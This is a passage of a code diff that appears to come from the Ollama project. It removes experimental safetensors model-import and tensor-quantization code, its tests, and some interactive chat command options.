-				fmt.Printf("error: %v\n", err)
-				continue
-			}
-			fmt.Printf("Created new model '%s'\n", args[1])
-			continue
 		case strings.HasPrefix(line, "/"):
 			fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
 			continue
@@ -1028,12 +723,10 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			newMessage := api.Message{Role: "user", Content: sb.String()}
 			messages = append(messages, newMessage)

-			verbose, _ := cmd.Flags().GetBool("verbose")
 			opts := RunOptions{
 				Model:        modelName,
 				Messages:     messages,
 				WordWrap:     wordWrap,
-				Format:       format,
 				Options:      options,
 				Think:        think,
 				HideThinking: hideThinking,
@@ -1041,7 +734,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 				Tools:        toolRegistry,
 				Approval:     approval,
 				YoloMode:     yoloMode,
-				Verbose:      verbose,
 			}

 			assistant, err := Chat(cmd.Context(), opts)
--- a/x/create/client/create.go
+++ b/x/create/client/create.go
@@ -1,299 +0,0 @@
-// Package client provides client-side model creation for safetensors-based models.
-//
-// This package is in x/ because the safetensors model storage format is under development.
-// It also exists to break an import cycle: server imports x/create, so x/create
-// cannot import server. This sub-package can import server because server doesn't
-// import it.
-package client
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-
-	"github.com/ollama/ollama/parser"
-	"github.com/ollama/ollama/progress"
-	"github.com/ollama/ollama/server"
-	"github.com/ollama/ollama/types/model"
-	"github.com/ollama/ollama/x/create"
-)
-
-// MinOllamaVersion is the minimum Ollama version required for safetensors models.
-const MinOllamaVersion = "0.14.0"
-
-// ModelfileConfig holds configuration extracted from a Modelfile.
-type ModelfileConfig struct {
-	Template string
-	System   string
-	License  string
-}
-
-// CreateOptions holds all options for model creation.
-type CreateOptions struct {
-	ModelName string
-	ModelDir  string
-	Quantize  string           // "fp8" for quantization
-	Modelfile *ModelfileConfig // template/system/license from Modelfile
-}
-
-// CreateModel imports a model from a local directory.
-// This creates blobs and manifest directly on disk, bypassing the HTTP API.
-// Automatically detects model type (safetensors LLM vs image gen) and routes accordingly.
-func CreateModel(opts CreateOptions, p *progress.Progress) error {
-	// Detect model type
-	isSafetensors := create.IsSafetensorsModelDir(opts.ModelDir)
-	isImageGen := create.IsTensorModelDir(opts.ModelDir)
-
-	if !isSafetensors && !isImageGen {
-		return fmt.Errorf("%s is not a supported model directory (needs config.json + *.safetensors or model_index.json)", opts.ModelDir)
-	}
-
-	// Determine model type settings
-	var modelType, spinnerKey string
-	var capabilities []string
-	if isSafetensors {
-		modelType = "safetensors model"
-		spinnerKey = "create"
-		capabilities = []string{"completion"}
-	} else {
-		modelType = "image generation model"
-		spinnerKey = "imagegen"
-		capabilities = []string{"image"}
-	}
-
-	// Set up progress spinner
-	statusMsg := "importing " + modelType
-	spinner := progress.NewSpinner(statusMsg)
-	p.Add(spinnerKey, spinner)
-
-	progressFn := func(msg string) {
-		spinner.Stop()
-		statusMsg = msg
-		spinner = progress.NewSpinner(statusMsg)
-		p.Add(spinnerKey, spinner)
-	}
-
-	// Create the model using shared callbacks
-	var err error
-	if isSafetensors {
-		err = create.CreateSafetensorsModel(
-			opts.ModelName, opts.ModelDir, opts.Quantize,
-			newLayerCreator(), newTensorLayerCreator(),
-			newManifestWriter(opts, capabilities),
-			progressFn,
-		)
-	} else {
-		err = create.CreateImageGenModel(
-			opts.ModelName, opts.ModelDir, opts.Quantize,
-			newLayerCreator(), newTensorLayerCreator(),
-			newManifestWriter(opts, capabilities),
-			progressFn,
-		)
-	}
-
-	spinner.Stop()
-	if err != nil {
-		return err
-	}
-
-	fmt.Printf("Created %s '%s'\n", modelType, opts.ModelName)
-	return nil
-}
-
-// newLayerCreator returns a LayerCreator callback for creating config/JSON layers.
-func newLayerCreator() create.LayerCreator {
-	return func(r io.Reader, mediaType, name string) (create.LayerInfo, error) {
-		layer, err := server.NewLayer(r, mediaType)
-		if err != nil {
-			return create.LayerInfo{}, err
-		}
-
-		return create.LayerInfo{
-			Digest:    layer.Digest,
-			Size:      layer.Size,
-			MediaType: layer.MediaType,
-			Name:      name,
-		}, nil
-	}
-}
-
-// newTensorLayerCreator returns a QuantizingTensorLayerCreator callback for creating tensor layers.
-// When quantize is non-empty, returns multiple layers (weight + scales + optional qbias).
-func newTensorLayerCreator() create.QuantizingTensorLayerCreator {
-	return func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
-		if quantize != "" {
-			return createQuantizedLayers(r, name, dtype, shape, quantize)
-		}
-		return createUnquantizedLayer(r, name)
-	}
-}
-
-// createQuantizedLayers quantizes a tensor and returns the resulting layers.
-func createQuantizedLayers(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
-	if !QuantizeSupported() {
-		return nil, fmt.Errorf("quantization requires MLX support")
-	}
-
-	// Quantize the tensor
-	qweightData, scalesData, qbiasData, _, _, _, err := quantizeTensor(r, name, dtype, shape, quantize)
-	if err != nil {
-		return nil, fmt.Errorf("failed to quantize %s: %w", name, err)
-	}
-
-	// Create layer for quantized weight
-	weightLayer, err := server.NewLayer(bytes.NewReader(qweightData), server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	// Create layer for scales
-	scalesLayer, err := server.NewLayer(bytes.NewReader(scalesData), server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	layers := []create.LayerInfo{
-		{
-			Digest:    weightLayer.Digest,
-			Size:      weightLayer.Size,
-			MediaType: weightLayer.MediaType,
-			Name:      name,
-		},
-		{
-			Digest:    scalesLayer.Digest,
-			Size:      scalesLayer.Size,
-			MediaType: scalesLayer.MediaType,
-			Name:      name + "_scale",
-		},
-	}
-
-	// Add qbiases layer if present (affine mode)
-	if qbiasData != nil {
-		qbiasLayer, err := server.NewLayer(bytes.NewReader(qbiasData), server.MediaTypeImageTensor)
-		if err != nil {
-			return nil, err
-		}
-		layers = append(layers, create.LayerInfo{
-			Digest:    qbiasLayer.Digest,
-			Size:      qbiasLayer.Size,
-			MediaType: qbiasLayer.MediaType,
-			Name:      name + "_qbias",
-		})
-	}
-
-	return layers, nil
-}
-
-// createUnquantizedLayer creates a single tensor layer without quantization.
-func createUnquantizedLayer(r io.Reader, name string) ([]create.LayerInfo, error) {
-	layer, err := server.NewLayer(r, server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	return []create.LayerInfo{
-		{
-			Digest:    layer.Digest,
-			Size:      layer.Size,
-			MediaType: layer.MediaType,
-			Name:      name,
-		},
-	}, nil
-}
-
-// newManifestWriter returns a ManifestWriter callback for writing the model manifest.
-func newManifestWriter(opts CreateOptions, capabilities []string) create.ManifestWriter {
-	return func(modelName string, config create.LayerInfo, layers []create.LayerInfo) error {
-		name := model.ParseName(modelName)
-		if !name.IsValid() {
-			return fmt.Errorf("invalid model name: %s", modelName)
-		}
-
-		// Create config blob with version requirement
-		configData := model.ConfigV2{
-			ModelFormat:  "safetensors",
-			Capabilities: capabilities,
-			Requires:     MinOllamaVersion,
-		}
-		configJSON, err := json.Marshal(configData)
-		if err != nil {
-			return fmt.Errorf("failed to marshal config: %w", err)
-		}
-
-		// Create config layer blob
-		configLayer, err := server.NewLayer(bytes.NewReader(configJSON), "application/vnd.docker.container.image.v1+json")
-		if err != nil {
-			return fmt.Errorf("failed to create config layer: %w", err)
-		}
-
-		// Convert LayerInfo to server.Layer
-		serverLayers := make([]server.Layer, 0, len(layers))
-		for _, l := range layers {
-			serverLayers = append(serverLayers, server.Layer{
-				MediaType: l.MediaType,
-				Digest:    l.Digest,
-				Size:      l.Size,
-				Name:      l.Name,
-			})
-		}
-
-		// Add Modelfile layers if present
-		if opts.Modelfile != nil {
-			modelfileLayers, err := createModelfileLayers(opts.Modelfile)
-			if err != nil {
-				return err
-			}
-			serverLayers = append(serverLayers, modelfileLayers...)
-		}
-
-		return server.WriteManifest(name, configLayer, serverLayers)
-	}
-}
-
-// createModelfileLayers creates layers for template, system, and license from Modelfile config.
-func createModelfileLayers(mf *ModelfileConfig) ([]server.Layer, error) {
-	var layers []server.Layer
-
-	if mf.Template != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.Template)), "application/vnd.ollama.image.template")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create template layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	if mf.System != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.System)), "application/vnd.ollama.image.system")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create system layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	if mf.License != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.License)), "application/vnd.ollama.image.license")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create license layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	return layers, nil
-}
-
-// ExtractModelfileConfig extracts template, system, and license from a parsed Modelfile.
-func ExtractModelfileConfig(modelfile *parser.Modelfile) *ModelfileConfig {
-	mfConfig := &ModelfileConfig{}
-	for _, cmd := range modelfile.Commands {
-		switch cmd.Name {
-		case "template":
-			mfConfig.Template = cmd.Args
-		case "system":
-			mfConfig.System = cmd.Args
-		case "license":
-			mfConfig.License = cmd.Args
-		}
-	}
-	return mfConfig
-}
--- a/x/create/client/create_test.go
+++ b/x/create/client/create_test.go
@@ -1,146 +0,0 @@
-package client
-
-import (
-	"testing"
-)
-
-func TestModelfileConfig(t *testing.T) {
-	// Test that ModelfileConfig struct works as expected
-	config := &ModelfileConfig{
-		Template: "{{ .Prompt }}",
-		System:   "You are a helpful assistant.",
-		License:  "MIT",
-	}
-
-	if config.Template != "{{ .Prompt }}" {
-		t.Errorf("Template = %q, want %q", config.Template, "{{ .Prompt }}")
-	}
-	if config.System != "You are a helpful assistant." {
-		t.Errorf("System = %q, want %q", config.System, "You are a helpful assistant.")
-	}
-	if config.License != "MIT" {
-		t.Errorf("License = %q, want %q", config.License, "MIT")
-	}
-}
-
-func TestModelfileConfig_Empty(t *testing.T) {
-	config := &ModelfileConfig{}
-
-	if config.Template != "" {
-		t.Errorf("Template should be empty, got %q", config.Template)
-	}
-	if config.System != "" {
-		t.Errorf("System should be empty, got %q", config.System)
-	}
-	if config.License != "" {
-		t.Errorf("License should be empty, got %q", config.License)
-	}
-}
-
-func TestModelfileConfig_PartialFields(t *testing.T) {
-	// Test config with only some fields set
-	config := &ModelfileConfig{
-		Template: "{{ .Prompt }}",
-		// System and License intentionally empty
-	}
-
-	if config.Template == "" {
-		t.Error("Template should not be empty")
-	}
-	if config.System != "" {
-		t.Error("System should be empty")
-	}
-	if config.License != "" {
-		t.Error("License should be empty")
-	}
-}
-
-func TestMinOllamaVersion(t *testing.T) {
-	// Verify the minimum version constant is set
-	if MinOllamaVersion == "" {
-		t.Error("MinOllamaVersion should not be empty")
-	}
-	if MinOllamaVersion != "0.14.0" {
-		t.Errorf("MinOllamaVersion = %q, want %q", MinOllamaVersion, "0.14.0")
-	}
-}
-
-func TestCreateModel_InvalidDir(t *testing.T) {
-	// Test that CreateModel returns error for invalid directory
-	err := CreateModel(CreateOptions{
-		ModelName: "test-model",
-		ModelDir:  "/nonexistent/path",
-	}, nil)
-	if err == nil {
-		t.Error("expected error for nonexistent directory, got nil")
-	}
-}
-
-func TestCreateModel_NotSafetensorsDir(t *testing.T) {
-	// Test that CreateModel returns error for directory without safetensors
-	dir := t.TempDir()
-
-	err := CreateModel(CreateOptions{
-		ModelName: "test-model",
-		ModelDir:  dir,
-	}, nil)
-	if err == nil {
-		t.Error("expected error for empty directory, got nil")
-	}
-}
-
-func TestCreateOptions(t *testing.T) {
-	opts := CreateOptions{
-		ModelName: "my-model",
-		ModelDir:  "/path/to/model",
-		Quantize:  "fp8",
-		Modelfile: &ModelfileConfig{
-			Template: "test",
-			System:   "system",
-			License:  "MIT",
-		},
-	}
-
-	if opts.ModelName != "my-model" {
-		t.Errorf("ModelName = %q, want %q", opts.ModelName, "my-model")
-	}
-	if opts.ModelDir != "/path/to/model" {
-		t.Errorf("ModelDir = %q, want %q", opts.ModelDir, "/path/to/model")
-	}
-	if opts.Quantize != "fp8" {
-		t.Errorf("Quantize = %q, want %q", opts.Quantize, "fp8")
-	}
-	if opts.Modelfile == nil {
-		t.Error("Modelfile should not be nil")
-	}
-	if opts.Modelfile.Template != "test" {
-		t.Errorf("Modelfile.Template = %q, want %q", opts.Modelfile.Template, "test")
-	}
-}
-
-func TestCreateOptions_Defaults(t *testing.T) {
-	opts := CreateOptions{
-		ModelName: "test",
-		ModelDir:  "/tmp",
-	}
-
-	// Quantize should default to empty
-	if opts.Quantize != "" {
-		t.Errorf("Quantize should be empty by default, got %q", opts.Quantize)
-	}
-
-	// Modelfile should default to nil
-	if opts.Modelfile != nil {
-		t.Error("Modelfile should be nil by default")
-	}
-}
-
-func TestQuantizeSupported(t *testing.T) {
-	// This just verifies the function exists and returns a boolean
-	// The actual value depends on build tags (mlx vs non-mlx)
-	supported := QuantizeSupported()
-
-	// In non-mlx builds, this should be false
-	// We can't easily test both cases, so just verify it returns something
-	_ = supported
-}
--- a/x/create/client/quantize.go
+++ b/x/create/client/quantize.go
@@ -1,130 +0,0 @@
-//go:build mlx
-
-package client
-
-import (
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// quantizeTensor loads a tensor from safetensors format, quantizes it,
-// and returns safetensors data for the quantized weights, scales, and biases.
-// Supported quantization types: "fp8" (affine 8-bit)
-// Uses MLX's native SaveSafetensors to ensure correct dtype handling (especially uint32 for quantized weights).
-func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
-	tmpDir := ensureTempDir()
-
-	// Read safetensors data to a temp file (LoadSafetensorsNative needs a path)
-	tmpFile, err := os.CreateTemp(tmpDir, "quant-input-*.safetensors")
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to create temp file: %w", err)
-	}
-	tmpPath := tmpFile.Name()
-	defer os.Remove(tmpPath)
-
-	if _, err := io.Copy(tmpFile, r); err != nil {
-		tmpFile.Close()
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to write temp file: %w", err)
-	}
-	tmpFile.Close()
-
-	// Load the tensor using MLX's native loader
-	st, err := mlx.LoadSafetensorsNative(tmpPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to load safetensors: %w", err)
-	}
-	defer st.Free()
-
-	// Get the tensor (it's stored as "data" in our minimal safetensors format)
-	arr := st.Get("data")
-	if arr == nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("tensor 'data' not found in safetensors")
-	}
-
-	// Convert to BFloat16 if needed (quantize expects float type)
-	if arr.Dtype() != mlx.DtypeBFloat16 && arr.Dtype() != mlx.DtypeFloat32 && arr.Dtype() != mlx.DtypeFloat16 {
-		arr = mlx.AsType(arr, mlx.DtypeBFloat16)
-		mlx.Eval(arr)
-	}
-
-	// Quantize based on quantization type
-	var qweight, scales, qbiases *mlx.Array
-	switch quantize {
-	case "fp4":
-		// affine mode: group_size=32, bits=4
-		qweight, scales, qbiases = mlx.Quantize(arr, 32, 4, "affine")
-	case "fp8":
-		// affine mode: group_size=32, bits=8
-		qweight, scales, qbiases = mlx.Quantize(arr, 32, 8, "affine")
-	default:
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("unsupported quantization type: %s", quantize)
-	}
-
-	// Eval and make contiguous for data access
-	qweight = mlx.Contiguous(qweight)
-	scales = mlx.Contiguous(scales)
-	if qbiases != nil {
-		qbiases = mlx.Contiguous(qbiases)
-		mlx.Eval(qweight, scales, qbiases)
-	} else {
-		mlx.Eval(qweight, scales)
-	}
-
-	// Get shapes
-	qweightShape = qweight.Shape()
-	scalesShape = scales.Shape()
-
-	// Save quantized weight using MLX's native safetensors (correctly handles uint32 dtype)
-	qweightPath := filepath.Join(tmpDir, "qweight.safetensors")
-	defer os.Remove(qweightPath)
-	if err := mlx.SaveSafetensors(qweightPath, map[string]*mlx.Array{"data": qweight}); err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save quantized weight: %w", err)
-	}
-	qweightData, err = os.ReadFile(qweightPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read quantized weight: %w", err)
-	}
-
-	// Save scales using MLX's native safetensors
-	scalesPath := filepath.Join(tmpDir, "scales.safetensors")
-	defer os.Remove(scalesPath)
-	if err := mlx.SaveSafetensors(scalesPath, map[string]*mlx.Array{"data": scales}); err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save scales: %w", err)
-	}
-	scalesData, err = os.ReadFile(scalesPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read scales: %w", err)
-	}
-
-	// Affine mode returns qbiases for zero-point offset
-	if qbiases != nil {
-		qbiasShape = qbiases.Shape()
-		qbiasPath := filepath.Join(tmpDir, "qbias.safetensors")
-		defer os.Remove(qbiasPath)
-		if err := mlx.SaveSafetensors(qbiasPath, map[string]*mlx.Array{"data": qbiases}); err != nil {
-			return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save qbiases: %w", err)
-		}
-		qbiasData, err = os.ReadFile(qbiasPath)
-		if err != nil {
-			return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read qbiases: %w", err)
-		}
-	}
-
-	return qweightData, scalesData, qbiasData, qweightShape, scalesShape, qbiasShape, nil
-}
-
-// QuantizeSupported returns true if quantization is supported (MLX build)
-func QuantizeSupported() bool {
-	return true
-}
-
-// ensureTempDir creates the temp directory for quantization if it doesn't exist
-func ensureTempDir() string {
-	tmpDir := filepath.Join(os.TempDir(), "ollama-quantize")
-	os.MkdirAll(tmpDir, 0755)
-	return tmpDir
-}
--- a/x/create/client/quantize_stub.go
+++ b/x/create/client/quantize_stub.go
@@ -1,18 +0,0 @@
-//go:build !mlx
-
-package client
-
-import (
-	"fmt"
-	"io"
-)
-
-// quantizeTensor is not available without MLX
-func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
-	return nil, nil, nil, nil, nil, nil, fmt.Errorf("quantization requires MLX support (build with mlx tag)")
-}
-
-// QuantizeSupported returns false when MLX is not available
-func QuantizeSupported() bool {
-	return false
-}
--- a/x/create/create.go
+++ b/x/create/create.go
@@ -1,399 +0,0 @@
-package create
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"slices"
-	"strings"
-
-	"github.com/ollama/ollama/envconfig"
-	"github.com/ollama/ollama/x/imagegen/safetensors"
-)
-
-// ModelConfig represents the config blob stored with a model.
-type ModelConfig struct {
-	ModelFormat  string   `json:"model_format"`
-	Capabilities []string `json:"capabilities"`
-}
-
-// Manifest represents the manifest JSON structure.
-type Manifest struct {
-	SchemaVersion int             `json:"schemaVersion"`
-	MediaType     string          `json:"mediaType"`
-	Config        ManifestLayer   `json:"config"`
-	Layers        []ManifestLayer `json:"layers"`
-}
-
-// ManifestLayer represents a layer in the manifest.
-type ManifestLayer struct {
-	MediaType string `json:"mediaType"`
-	Digest    string `json:"digest"`
-	Size      int64  `json:"size"`
-	Name      string `json:"name,omitempty"`
-}
-
-// defaultManifestDir returns the manifest storage directory.
-func defaultManifestDir() string {
-	return filepath.Join(envconfig.Models(), "manifests")
-}
-
-// defaultBlobDir returns the blob storage directory.
-func defaultBlobDir() string {
-	return filepath.Join(envconfig.Models(), "blobs")
-}
-
-// resolveManifestPath converts a model name to a manifest file path.
-func resolveManifestPath(modelName string) string {
-	host := "registry.ollama.ai"
-	namespace := "library"
-	name := modelName
-	tag := "latest"
-
-	if idx := strings.LastIndex(name, ":"); idx != -1 {
-		tag = name[idx+1:]
-		name = name[:idx]
-	}
-
-	parts := strings.Split(name, "/")
-	switch len(parts) {
-	case 3:
-		host = parts[0]
-		namespace = parts[1]
-		name = parts[2]
-	case 2:
-		namespace = parts[0]
-		name = parts[1]
-	}
-
-	return filepath.Join(defaultManifestDir(), host, namespace, name, tag)
-}
-
-// loadManifest loads a manifest for the given model name.
-func loadManifest(modelName string) (*Manifest, error) {
-	manifestPath := resolveManifestPath(modelName)
-
-	data, err := os.ReadFile(manifestPath)
-	if err != nil {
-		return nil, err
-	}
-
-	var manifest Manifest
-	if err := json.Unmarshal(data, &manifest); err != nil {
-		return nil, err
-	}
-
-	return &manifest, nil
-}
-
-// loadModelConfig loads the config blob for a model.
-func loadModelConfig(modelName string) (*ModelConfig, error) {
-	manifest, err := loadManifest(modelName)
-	if err != nil {
-		return nil, err
-	}
-
-	// Read the config blob
-	blobName := strings.Replace(manifest.Config.Digest, ":", "-", 1)
-	blobPath := filepath.Join(defaultBlobDir(), blobName)
-
-	data, err := os.ReadFile(blobPath)
-	if err != nil {
-		return nil, err
-	}
-
-	var config ModelConfig
-	if err := json.Unmarshal(data, &config); err != nil {
-		return nil, err
-	}
-
-	return &config, nil
-}
-
-// IsSafetensorsModel checks if a model was created with the experimental
-// safetensors builder by checking the model format in the config.
-func IsSafetensorsModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors"
-}
-
-// IsSafetensorsLLMModel checks if a model is a safetensors LLM model
-// (has completion capability, not image generation).
-func IsSafetensorsLLMModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "completion")
-}
-
-// IsImageGenModel checks if a model is an image generation model
-// (has image capability).
-func IsImageGenModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "image")
-}
-
-// GetModelArchitecture returns the architecture from the model's config.json layer.
-func GetModelArchitecture(modelName string) (string, error) {
-	manifest, err := loadManifest(modelName)
-	if err != nil {
-		return "", err
-	}
-
-	// Find the config.json layer
-	for _, layer := range manifest.Layers {
-		if layer.Name == "config.json" && layer.MediaType == "application/vnd.ollama.image.json" {
-			blobName := strings.Replace(layer.Digest, ":", "-", 1)
-			blobPath := filepath.Join(defaultBlobDir(), blobName)
-
-			data, err := os.ReadFile(blobPath)
-			if err != nil {
-				return "", err
-			}
-
-			var cfg struct {
-				Architectures []string `json:"architectures"`
-				ModelType     string   `json:"model_type"`
-			}
-			if err := json.Unmarshal(data, &cfg); err != nil {
-				return "", err
-			}
-
-			// Prefer model_type, fall back to first architecture
-			if cfg.ModelType != "" {
-				return cfg.ModelType, nil
-			}
-			if len(cfg.Architectures) > 0 {
-				return cfg.Architectures[0], nil
-			}
-		}
-	}
-
-	return "", fmt.Errorf("architecture not found in model config")
-}
-
-// IsTensorModelDir checks if the directory contains a diffusers-style tensor model
-// by looking for model_index.json, which is the standard diffusers pipeline config.
-func IsTensorModelDir(dir string) bool {
-	_, err := os.Stat(filepath.Join(dir, "model_index.json"))
-	return err == nil
-}
-
-// IsSafetensorsModelDir checks if the directory contains a standard safetensors model
-// by looking for config.json and at least one .safetensors file.
-func IsSafetensorsModelDir(dir string) bool {
-	// Must have config.json
-	if _, err := os.Stat(filepath.Join(dir, "config.json")); err != nil {
-		return false
-	}
-
-	// Must have at least one .safetensors file
-	entries, err := os.ReadDir(dir)
-	if err != nil {
-		return false
-	}
-
-	for _, entry := range entries {
-		if strings.HasSuffix(entry.Name(), ".safetensors") {
-			return true
-		}
-	}
-
-	return false
-}
-
-// LayerInfo holds metadata for a created layer.
-type LayerInfo struct {
-	Digest    string
-	Size      int64
-	MediaType string
-	Name      string // Path-style name: "component/tensor" or "path/to/config.json"
-}
-
-// LayerCreator is called to create a blob layer.
-// name is the path-style name (e.g., "tokenizer/tokenizer.json")
-type LayerCreator func(r io.Reader, mediaType, name string) (LayerInfo, error)
-
-// TensorLayerCreator creates a tensor blob layer with metadata.
-// name is the path-style name including component (e.g., "text_encoder/model.embed_tokens.weight")
-type TensorLayerCreator func(r io.Reader, name, dtype string, shape []int32) (LayerInfo, error)
-
-// QuantizingTensorLayerCreator creates tensor layers with optional quantization.
-// When quantize is non-empty (e.g., "fp8"), returns multiple layers (weight + scales + biases).
-type QuantizingTensorLayerCreator func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error)
-
-// ManifestWriter writes the manifest file.
-type ManifestWriter func(modelName string, config LayerInfo, layers []LayerInfo) error
-
-// ShouldQuantize returns true if a tensor should be quantized.
-// For image gen models (component non-empty): quantizes linear weights, skipping VAE, embeddings, norms.
-// For LLM models (component empty): quantizes linear weights, skipping embeddings, norms, and small tensors.
-func ShouldQuantize(name, component string) bool {
-	// Image gen specific: skip VAE entirely
-	if component == "vae" {
-		return false
-	}
-
-	// Skip embeddings
-	if strings.Contains(name, "embed") {
-		return false
-	}
-
-	// Skip layer norms and RMS norms
-	if strings.Contains(name, "norm") || strings.Contains(name, "ln_") || strings.Contains(name, "layernorm") {
-		return false
-	}
-
-	// Skip biases
-	if strings.HasSuffix(name, ".bias") {
-		return false
-	}
-
-	// Only quantize weights
-	return strings.HasSuffix(name, ".weight")
-}
-
-// ShouldQuantizeTensor returns true if a tensor should be quantized based on name and shape.
-// This is a more detailed check that also considers tensor dimensions.
-func ShouldQuantizeTensor(name string, shape []int32) bool {
-	// Use basic name-based check first
-	if !ShouldQuantize(name, "") {
-		return false
-	}
-
-	// Only quantize 2D tensors (linear layers) - skip 1D (biases, norms) and higher-D (convolutions if any)
-	if len(shape) != 2 {
-		return false
-	}
-
-	// Skip small tensors (less than 1024 elements) - not worth quantizing
-	if len(shape) >= 2 && int64(shape[0])*int64(shape[1]) < 1024 {
-		return false
-	}
-
-	// MLX quantization requires last dimension to be divisible by group size (32)
-	if shape[len(shape)-1]%32 != 0 {
-		return false
-	}
-
-	return true
-}
-
-// CreateSafetensorsModel imports a standard safetensors model from a directory.
-// This handles Hugging Face style models with config.json and *.safetensors files.
-// Stores each tensor as a separate blob for fine-grained deduplication.
-// If quantize is non-empty (e.g., "fp8"), eligible tensors will be quantized.
-func CreateSafetensorsModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
-	var layers []LayerInfo
-	var configLayer LayerInfo
-
-	entries, err := os.ReadDir(modelDir)
-	if err != nil {
-		return fmt.Errorf("failed to read directory: %w", err)
-	}
-
-	// Process all safetensors files
-	for _, entry := range entries {
-		if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".safetensors") {
-			continue
-		}
-
-		stPath := filepath.Join(modelDir, entry.Name())
-
-		// Extract individual tensors from safetensors file
-		extractor, err := safetensors.OpenForExtraction(stPath)
-		if err != nil {
-			return fmt.Errorf("failed to open %s: %w", stPath, err)
-		}
-
-		tensorNames := extractor.ListTensors()
-		quantizeMsg := ""
-		if quantize != "" {
-			quantizeMsg = fmt.Sprintf(", quantizing to %s", quantize)
-		}
-		fn(fmt.Sprintf("importing %s (%d tensors%s)", entry.Name(), len(tensorNames), quantizeMsg))
-
-		for _, tensorName := range tensorNames {
-			td, err := extractor.GetTensor(tensorName)
-			if err != nil {
-				extractor.Close()
-				return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
-			}
-
-			// Determine quantization type for this tensor (empty string if not quantizing)
-			quantizeType := ""
-			if quantize != "" && ShouldQuantizeTensor(tensorName, td.Shape) {
-				quantizeType = quantize
-			}
-
-			// Store as minimal safetensors format (88 bytes header overhead)
-			// This enables native mmap loading via mlx_load_safetensors
-			// createTensorLayer returns multiple layers if quantizing (weight + scales)
-			newLayers, err := createTensorLayer(td.SafetensorsReader(), tensorName, td.Dtype, td.Shape, quantizeType)
-			if err != nil {
-				extractor.Close()
-				return fmt.Errorf("failed to create layer for %s: %w", tensorName, err)
-			}
-			layers = append(layers, newLayers...)
-		}
-
-		extractor.Close()
-	}
-
-	// Process all JSON config files
-	for _, entry := range entries {
-		if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".json") {
-			continue
-		}
-
-		// Skip the index file as we don't need it after extraction
-		if entry.Name() == "model.safetensors.index.json" {
-			continue
-		}
-
-		cfgPath := entry.Name()
-		fullPath := filepath.Join(modelDir, cfgPath)
-
-		fn(fmt.Sprintf("importing config %s", cfgPath))
-
-		f, err := os.Open(fullPath)
-		if err != nil {
-			return fmt.Errorf("failed to open %s: %w", cfgPath, err)
-		}
-
-		layer, err := createLayer(f, "application/vnd.ollama.image.json", cfgPath)
-		f.Close()
-		if err != nil {
-			return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
-		}
-
-		// Use config.json as the config layer
-		if cfgPath == "config.json" {
-			configLayer = layer
-		}
-
-		layers = append(layers, layer)
-	}
-
-	if configLayer.Digest == "" {
-		return fmt.Errorf("config.json not found in %s", modelDir)
-	}
-
-	fn(fmt.Sprintf("writing manifest for %s", modelName))
-
-	if err := writeManifest(modelName, configLayer, layers); err != nil {
-		return fmt.Errorf("failed to write manifest: %w", err)
-	}
-
-	fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
-	return nil
-}
--- a/x/create/create_test.go
+++ b/x/create/create_test.go
@@ -1,752 +0,0 @@
-package create
-
-import (
-	"bytes"
-	"encoding/binary"
-	"encoding/json"
-	"io"
-	"os"
-	"path/filepath"
-	"strings"
-	"testing"
-)
-
-func TestIsTensorModelDir(t *testing.T) {
-	tests := []struct {
-		name     string
